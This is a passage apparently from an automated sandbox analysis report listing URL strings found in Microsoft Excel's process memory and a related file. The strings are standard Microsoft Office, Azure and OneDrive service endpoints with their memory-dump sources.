    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeh
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizei
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeo
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizes
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizet
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizete
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizev
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizew
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizex
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizey
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://loki.d
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1MBI_SSL_SHORT
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://management.azure.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://management.azure.com/
    Source: EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://messaging.office.com/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy2
    Source: EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://nam.learn
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.o
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechT
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://ncus.contentsync.
    Source: EXCEL.EXE, 00000000.00000003.886777614.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892135449.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285010208.0000000012920000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/W-
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules.
    Source: EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.890478896.000000000EF42000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/abce
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://officeapps.live.com
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com$
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com&
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com.dllt
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com0D
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com2
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com8
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com:
    Source: EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884962144.00000000129CE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892295205.00000000129D1000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comAugmentationLoopServicePriorityhttps://augloop.office.com;https://augloop
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comF
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comH/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comJ
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comL
    Source: EXCEL.EXE, 00000000.00000003.883987348.000000000F04A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comN
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comP
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comR
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comX
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comZ
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comb
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comd
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comh
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comr
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coms.dll
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comv
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comx
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: EXCEL.EXE, 00000000.00000002.890687010.000000000EFB6000.00000004.00000001.sdmpString found in binary or memory: https://officeclient.micr
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://officesetup.getmicrosoftkey.com:U
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated~
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://onedrive.live.com
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
